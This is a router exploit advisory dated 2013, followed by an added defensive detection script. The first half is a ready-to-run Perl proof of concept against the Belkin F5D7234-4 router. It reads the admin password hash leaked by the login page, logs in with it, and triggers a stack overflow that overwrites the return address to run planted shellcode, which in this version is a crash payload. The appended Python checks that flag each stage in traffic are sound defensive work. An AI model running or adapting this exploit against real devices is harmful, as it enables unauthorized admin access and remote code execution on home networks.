
Belkin G Wireless Router RCE PoC

Posted on 26 August 2013

<pre>
| Belkin G Wireless Router RCE PoC. |

Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version     : 1.18
Hardware         : F5D7234-4 v5 (01)
Author           : Aodrulez.
Email            : atul.alex@orchidseven.com
Twitter          : http://twitter.com/Aodrulez

+---------+
| Details |
+---------+

The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.

This particular model of router is based on 'embedded Configurable operating system', a.k.a. eCos, version 2.0.
The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.

Video Demo : http://www.youtube.com/watch?v=MtrYs-f6X3E

+---------+
| Exploit |
+---------+

#!/usr/bin/perl
use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser  = LWP::UserAgent->new;
my $passHash = "";
my $url      = "";
my $response = "";
my $ip       = "";
$browser->timeout(10);

# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode = "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";

sub Authenticate()
{
    print "[+] Trying to authenticate.\n";
    $url = "http://$ip/login.stm";
    $response = $browser->get($url);
    # The login page embeds the admin password hash in a JavaScript variable.
    my @aod = $response->content =~ m/var password = "(.*)";/g;
    if (!$aod[0])
    {
        print "[-] Damn! Something went wrong. This might not work here :-/\n";
        exit;
    }
    else
    {
        $passHash = $aod[0];
        print "[+] Admin Password = $passHash (MD5 Hash).\n";
    }
    print "[+] Time to authenticate you!\n";
    $url = "http://$ip/cgi-bin/login.exe";
    $response = $browser->post($url, [
        'totalMSec' => "1377121454.99",
        'pws'       => "$passHash",
    ]);
    if ($response->content =~ /index/)
    {
        print "[+] Logged in successfully as 'Admin'!\n";
        print "[!] Open this link in a browser for admin access : http://$ip/setup.htm\n";
    }
    else
    {
        print "[-] Login failed! This might not work here :-/\n";
        exit;
    }
    print "\n[+] Continue with exploitation? (Y/N) : ";
    my $temp = <STDIN>;
    if ($temp =~ "Y" || $temp =~ "y")
    {
        Exploit();
    }
    else
    {
        print "[+] Have fun!\n";
        exit;
    }
}

sub Exploit()
{
    # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
    # 0x803c0278 is fixed for this device/firmware combination.
    print "[+] Stage 1 : Allocating shellcode.\n";
    if (length($shellcode) > 120)
    {
        print "[-] Shellcode is too big! (120 bytes Max)\n";
        exit;
    }
    print "[+] Shellcode length : " . length($shellcode) . "\n";
    # Fill the rest with nops. Not needed but good to have.
    # Shellcode size should ideally be a multiple of 4 as this is MIPS.
    my $nopsize = 120 - length($shellcode);
    $shellcode = $shellcode . ("\x20" x $nopsize);
    $url = "http://$ip/cgi-bin/wireless_WPA.exe";
    $response = $browser->post($url, [
        'wpa_authen'       => "1",
        'wpa_psk'          => '0',
        's_rekeysec'       => '900000',
        's_rekeypkt'       => '1000',
        'w802_rekey'       => '0',
        'encryption'       => '3',
        'security_type'    => '4',
        'authentication'   => '3',
        'encryption_hid'   => '3',
        'wpa_key_text'     => "ssss",
        'wpa_key_pass'     => "$shellcode",
        'obscure_psk'      => '1',
        'sharedkey_alter'  => '',
        'sharedkey_alter1' => '1',
    ]);
    if (!$response->content)
    {
        print "[-] Damn! Something went wrong. This might not work here :-/\n";
    }
    else
    {
        print "[+] Stage 1 seems to have gone well.\n";
    }

    # Stage 2: Trigger Stack Overflow & overwrite RA
    print "[+] Stage 2 : Triggering Return Address overwrite.\n";
    my $junk = "A" x 32;
    my $s0   = "BBBB";
    my $s1   = "CCCC";
    my $ra   = "\x78\x02\x3c\x80"; # EPC -> 0x803c0278 Fixed for this device/firmware combination.
    my $nop  = "\x20\x20\x20\x20";
    my $payload = $junk . $s0 . $s1 . $ra . $nop;
    $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
    $response = $browser->post($url, [ 'pin' => "$payload" ]);
    if (!$response->content)
    {
        print "[-] Damn! Something went wrong. This might not work here :-/\n";
    }
    else
    {
        print "[-] Done! \\m/\n";
    }
}

sub Welcome()
{
    print "\n+------------------------------------------+\n";
    print "| Belkin G Wireless Router Remote Exploit  |\n";
    print "| (Authentication bypass & RCE PoC)        |\n";
    print "+------------------------------------------+\n";
    print "[+] By Aodrulez.\n";
    print "\n[+] Usage   : perl $0 router_ip";
    print "\n[!] Example : perl $0 192.168.2.1";
    if (!$ARGV[0])
    {
        print "\n[-] (o_0) Seriously??\n";
        exit;
    }
    $ip = $ARGV[0];
    print "\n[+] Target IP : $ip\n";
}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.

+-------------------+
| Greetz Fly Out To |
+-------------------+

1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in

+-------+
| Quote |
+-------+

“I would rather die of passion than of boredom.” - Vincent van Gogh.
</pre>
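The three stages of the advisory correspond to three observable HTTP exchanges: an unauthenticated `GET /login.stm` whose response embeds the admin password hash, a `POST /cgi-bin/wireless_WPA.exe` whose `wpa_key_pass` field carries raw non-printable bytes padded to the 120-byte buffer, and a `POST /cgi-bin/wireless_WPS_Enroll.exe` whose `pin` field is far longer than any WPS PIN. The following Python script is an added example, not part of the original advisory or the author's code: it runs defensive checks over constructed traffic records (direction, path, body) so that a proxy, IDS or device audit can flag each stage. The paths and field names come from the advisory; the record format, the sample traffic and the thresholds (4- or 8-digit WPS PIN, 8 to 63 printable-ASCII WPA passphrase per IEEE 802.11i) are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

# Thresholds chosen for this example: WPS PINs are 4 or 8 decimal digits and
# WPA passphrases are 8 to 63 printable ASCII characters. The advisory
# describes a fixed 120-byte buffer behind wpa_key_pass, so anything longer
# than a legal passphrase is suspicious on its own.
WPS_PIN_RE = re.compile(r"^(\d{4}|\d{8})$")
LEAKED_HASH_RE = re.compile(r'var password = "([0-9a-fA-F]{32})"')
MAX_PASSPHRASE_LEN = 63


def _form(body: str) -> dict:
    # latin-1 maps every percent-encoded byte to exactly one character, so
    # bytes such as %04 or %ff survive decoding and can be inspected.
    parsed = parse_qs(body, keep_blank_values=True, encoding="latin-1")
    return {k: v[0] for k, v in parsed.items()}


def check_login_page(response_body: str) -> list[str]:
    """Stage 1 indicator: the login page itself discloses the admin hash."""
    if LEAKED_HASH_RE.search(response_body):
        return ["login page embeds admin password hash (unauthenticated disclosure)"]
    return []


def check_wpa_post(body: str) -> list[str]:
    """Stage 2 indicator: wpa_key_pass is oversized or carries non-printable bytes."""
    findings = []
    passphrase = _form(body).get("wpa_key_pass", "")
    if len(passphrase) > MAX_PASSPHRASE_LEN:
        findings.append(f"wpa_key_pass length {len(passphrase)} exceeds {MAX_PASSPHRASE_LEN}")
    if any(not 0x20 <= ord(c) <= 0x7E for c in passphrase):
        findings.append("wpa_key_pass contains non-printable bytes")
    return findings


def check_wps_post(body: str) -> list[str]:
    """Stage 3 indicator: the WPS enrol PIN is not a 4- or 8-digit PIN."""
    pin = _form(body).get("pin", "")
    if WPS_PIN_RE.match(pin):
        return []
    return [f"pin field is not a 4/8-digit WPS PIN (length {len(pin)})"]


def inspect(records: list[tuple[str, str, str]]) -> list[tuple[str, str]]:
    """records: (direction, path, body) with direction 'req' or 'resp'.
    Returns (path, finding) pairs for every stage that was observed."""
    out = []
    for direction, path, body in records:
        if direction == "resp" and path == "/login.stm":
            finds = check_login_page(body)
        elif direction == "req" and path == "/cgi-bin/wireless_WPA.exe":
            finds = check_wpa_post(body)
        elif direction == "req" and path == "/cgi-bin/wireless_WPS_Enroll.exe":
            finds = check_wps_post(body)
        else:
            finds = []
        out.extend((path, f) for f in finds)
    return out


# Constructed sample traffic mirroring the three stages (not a real capture).
SAMPLE = [
    ("resp", "/login.stm",
     '<script>var password = "d41d8cd98f00b204e9800998ecf8427e";</script>'),
    ("req", "/cgi-bin/wireless_WPA.exe",
     "wpa_authen=1&wpa_key_text=ssss&wpa_key_pass=" + "%20" * 12 + "%04%ff" + "%20" * 106),
    ("req", "/cgi-bin/wireless_WPS_Enroll.exe", "pin=" + "A" * 48),
    ("req", "/cgi-bin/wireless_WPS_Enroll.exe", "pin=12345670"),  # benign enrolment
]

if __name__ == "__main__":
    for path, finding in inspect(SAMPLE):
        print(f"{path}: {finding}")
```

Running the script reports four findings over the sample: the hash disclosure, two for the 120-byte non-printable `wpa_key_pass`, and one for the 48-character `pin`, while the benign 8-digit enrolment is silent. The stage-1 check is also a useful self-audit: fetch your own router's login page unauthenticated and confirm it contains no `var password` assignment.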

 
